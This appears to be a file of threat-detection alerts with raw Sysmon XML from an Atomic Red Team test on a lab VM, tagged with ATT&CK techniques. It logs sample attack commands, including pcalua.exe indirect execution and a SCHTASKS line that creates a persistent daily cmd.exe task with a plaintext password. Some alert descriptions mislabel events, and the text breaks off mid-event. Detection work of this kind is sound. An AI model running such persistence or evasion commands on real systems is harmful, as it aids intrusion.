+[T1202] Indirect Command Execution,1563548272.92361,2019-07-19T18:57:52.923610+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe  -a Java ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:50.453840Z"">
+    </TimeCreated>
+    <EventRecordID>4095</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:50.232</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6E-5D31-0000-001081F93E00</Data>
+    <Data Name=""ProcessId"">1284</Data>
+    <Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Program Compatibility Assistant</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">pcalua.exe  -a Java</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA6E-5D31-0000-0010D8F63E00</Data>
+    <Data Name=""ParentProcessId"">3316</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a Java&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548270.45384,2019-07-19T18:57:50.453840+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a Java&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:50.398446Z"">
+    </TimeCreated>
+    <EventRecordID>4094</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:50.198</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6E-5D31-0000-0010D8F63E00</Data>
+    <Data Name=""ProcessId"">3316</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a Java&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1563548270.398446,2019-07-19T18:57:50.398446+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe  -a -c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:47.238555Z"">
+    </TimeCreated>
+    <EventRecordID>4093</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:47.232</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6B-5D31-0000-00102DD33E00</Data>
+    <Data Name=""ProcessId"">5348</Data>
+    <Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Program Compatibility Assistant</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">pcalua.exe  -a -c</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA6B-5D31-0000-0010CCD03E00</Data>
+    <Data Name=""ParentProcessId"">5332</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a -c&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548267.238555,2019-07-19T18:57:47.238555+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a -c&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:47.218345Z"">
+    </TimeCreated>
+    <EventRecordID>4092</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:47.195</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6B-5D31-0000-0010CCD03E00</Data>
+    <Data Name=""ProcessId"">5332</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a -c&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548267.218345,2019-07-19T18:57:47.218345+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:46.927290Z"">
+    </TimeCreated>
+    <EventRecordID>4091</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:46.915</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-00104BC83E00</Data>
+    <Data Name=""ProcessId"">888</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1563548266.92729,2019-07-19T18:57:46.927290+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS  /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:46.849870Z"">
+    </TimeCreated>
+    <EventRecordID>4090</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:46.845</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010C5C43E00</Data>
+    <Data Name=""ProcessId"">3352</Data>
+    <Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Task Scheduler Configuration Tool</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">SCHTASKS  /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA6A-5D31-0000-001074C23E00</Data>
+    <Data Name=""ParentProcessId"">3872</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548266.84987,2019-07-19T18:57:46.849870+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:46.828722Z"">
+    </TimeCreated>
+    <EventRecordID>4089</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:46.814</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-001074C23E00</Data>
+    <Data Name=""ProcessId"">3872</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:50.764089Z"">
+    </TimeCreated>
+    <EventRecordID>4135</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:50.383</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DDB6-5D31-0000-0010273D4C00</Data>
+    <Data Name=""ProcessId"">3952</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-0020FF090500</Data>
+    <Data Name=""LogonId"">0x509ff</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D4A4-5D31-0000-0010DD6D0000</Data>
+    <Data Name=""ParentProcessId"">804</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:50.764089Z"">
+    </TimeCreated>
+    <EventRecordID>4135</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:50.383</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DDB6-5D31-0000-0010273D4C00</Data>
+    <Data Name=""ProcessId"">3952</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-0020FF090500</Data>
+    <Data Name=""LogonId"">0x509ff</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D4A4-5D31-0000-0010DD6D0000</Data>
+    <Data Name=""ParentProcessId"">804</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:50.764089Z"">
+    </TimeCreated>
+    <EventRecordID>4135</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:50.383</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DDB6-5D31-0000-0010273D4C00</Data>
+    <Data Name=""ProcessId"">3952</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-0020FF090500</Data>
